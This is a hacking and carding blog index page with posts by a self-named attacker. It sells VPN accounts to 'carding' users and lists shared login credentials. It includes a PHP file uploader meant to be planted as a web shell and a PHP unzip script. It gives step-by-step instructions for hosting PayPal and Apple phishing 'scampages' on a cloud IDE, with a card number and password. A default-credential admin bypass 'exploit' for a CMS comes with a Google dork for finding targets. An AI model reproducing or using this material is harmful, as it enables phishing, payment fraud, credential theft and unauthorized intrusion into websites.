Showing posts with label Exploit. Show all posts
Showing posts with label Exploit. Show all posts
Monday, 28 August 2017
Sunday, 16 July 2017
Sale HMA PRO VPN 12 Month for $10
FatkhurJuly 16, 2017Carding, Deface, Exploit, Method, News, Script, Skrill, Steam, VPN, X-Box
No comments
Hello :D carding user :D im sale hma account 12 month for $10 if you need ? pm via fb : fb.me/cesaret.sec
ready unlimited account :D
Trial Account : kadalngepet2 | wkwkland123 ( 12 month )
ready unlimited account :D
Trial Account : kadalngepet2 | wkwkland123 ( 12 month )
Saturday, 15 April 2017
Private PHP Uploader
<?php
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Cesaret_99 :)<b><br><br>'; }
else { echo '<b>Cesaret_99 :(</b><br><br>'; }
}
?>
How to created scampage Apple or PayPal HTTPS free no cPanel login
Open c9.io
Sign up
use temp email
Information :
Your Name : PayPal
User Name : Your username [accountlimited]
Tell us about yourself : random select
Confirm your details : next
Credit card details : 5488225525189141 02|2018 237
Created account success
Add workspace : select PHP
Confirm your email : Password use 9c9L7cFisT3R0wzpmytt
Click dir paypal New file double click in your file paste it its script : script
open your php upload : localhost/file.php
upload the script PayPal scampage : download waiting
upload php unzip
edit your php unzip
open your php unzip
Video
PHP unzip script in shell
<?php// config// -------------------------------// only file name + .zip$zip_filename = "YOURFILENAME.zip";?><!DOCTYPE html><html><head><meta charset='utf-8' ><title>Unzip</title><style>body{font-family: arial, sans-serif;word-wrap: break-word;}.wrapper{padding:20px;line-height: 1.5;font-size: 1rem;}span{font-family: 'Consolas', 'courier new', monospace;background: #eee;padding:2px;}</style></head><body><div class="wrapper"><?phpecho "Unzipping <span>" .__DIR__. "/" .$zip_filename. "</span> to <span>" .__DIR__. "</span><br>";echo "current dir: <span>" . __DIR__ . "</span><br>";$zip = new ZipArchive;$res = $zip->open(__DIR__ . '/' .$zip_filename);if ($res === TRUE) {$zip->extractTo(__DIR__);$zip->close();echo '<p style="color:#00C324;">Extract was successful! Enjoy ;)</p><br>';} else {echo '<p style="color:red;">Zip file not found!</p><br>';}?>End Script.</div></body></html>
Saturday, 1 April 2017
Exploit Bypass Admin Login WEBARQ
# # # #
# Exploit Title: Bypass Admin Login WEBARQ Content Management System 1.0.0
# Google Dork: Powered by WABARQ
# Date: 02.04.2017
# Vendor Homepage: https://www.webarq.com/
# Software: -/
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Cesaret_99
# Author Web: http://www.cesaret-official.com
# Author Mail : hariepradana@muslim.com
# #Cesaret_99
# # # # #
# Bypass /Exploit :
# POC : localhost/[PATH/admin-cp
# User/Password : admin
# Sulawesi I.T Security
# # # # #
# Exploit Title: Bypass Admin Login WEBARQ Content Management System 1.0.0
# Google Dork: Powered by WABARQ
# Date: 02.04.2017
# Vendor Homepage: https://www.webarq.com/
# Software: -/
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Cesaret_99
# Author Web: http://www.cesaret-official.com
# Author Mail : hariepradana@muslim.com
# #Cesaret_99
# # # # #
# Bypass /Exploit :
# POC : localhost/[PATH/admin-cp
# User/Password : admin
# Sulawesi I.T Security
# # # # #